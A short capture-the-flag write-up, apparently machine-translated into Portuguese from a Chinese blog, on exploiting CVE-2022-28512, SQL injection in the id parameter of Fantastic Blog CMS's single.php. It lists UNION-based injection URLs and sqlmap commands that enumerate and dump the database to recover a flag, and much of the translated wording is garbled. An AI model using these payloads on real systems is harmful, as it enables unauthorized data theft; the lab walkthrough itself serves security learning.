Spring Cloud Mirror: CVE-2022-28512 (SQL Injection)

Índice

1. Tópico

1. Injeção manual

2.sqlmap


1. Tópico

 introduzir:

        Fantastic Blog (CMS) é um sistema de gerenciamento de conteúdo web absolutamente fantástico para blogs/artigos. Ele permite que você gerencie facilmente seu site ou blog e oferece uma ampla gama de recursos para personalizar seu blog de acordo com suas necessidades. Ele está repleto de recursos e você pode colocar seu blog em funcionamento sem tocar em uma única linha de código. No caminho /single.php deste CMS, há uma vulnerabilidade de injeção de SQL no parâmetro id.

/single.php O diretório oficial fornecido por mim não foi escaneado ou esgotado. . .

Acesso direto ao ip: http://xxx/single.php?id=1

 id=1' erro: verifique se há uma vulnerabilidade de injeção de sql

 Não há nada mais do que dois tipos de vulnerabilidades de injeção SQL:

1. Injeção manual 2.sqlmap

1. Injeção manual

http://xxx.com/single.php?id=1' and 1=2 union select 1,2,3,4,5,6,7,8,9 --+

 ponto de injeção 2 

Consulte a biblioteca atual:

http://eci-2zecserefv52em912u7k.cloudeci1.ichunqiu.com/single.php
?id=1' and 1=2 union select 1,database(),3,4,5,6,7,8,9 --+

Confira a tabela: 

http://xxx.com/single.php
?id=1' and 1=2 union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()limit 10,1 --+

 tabela de bandeiras

 Coluna de consulta:

http://xxx.com/single.php
?id=1' and 1=2 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name='flag'limit 0,1 --+

 Campos de consulta:

http://eci-2zecserefv52em912u7k.cloudeci1.ichunqiu.com/single.php
?id=1' and 1=2 union select 1,flag,3,4,5,6,7,8,9 from flag limit 0,1 --+

cair  

2.sqlmap

Dois métodos:

Capture pacotes diretamente e grave-os em txt e execute diretamente

Você também pode explodir o URL e adicionar pontos de injeção

 captura de pacote burp

 Salvar em arquivo.txt 

sqlmap um garanhão:

Biblioteca de explosão:

python sqlmap.py -l xxx.txt --batch -dbs   //跑文件

python sqlmap.py -u http://xxx.com/single.php?id=1 --batch -dbs    //跑url

 A biblioteca ctf explodiu:

 Explodir tabela ctf:

 python sqlmap.py -l xxx.txt --batch -D "ctf" --tables

Explosão coluna falg:

python sqlmap.py -l xxx.txt --batch -D "ctf" -T "flag" --columns

 Valor do campo de rajada:

python sqlmap.py -l xxx.txt --batch -D "ctf" -T "flag" -C "flag" --dump

 bandeira{4448e436-7e63-4b52-85b9-5b9aa7bfc549} 

Supongo que te gusta

Origin blog.csdn.net/m0_65712192/article/details/130252353
Recomendado
Clasificación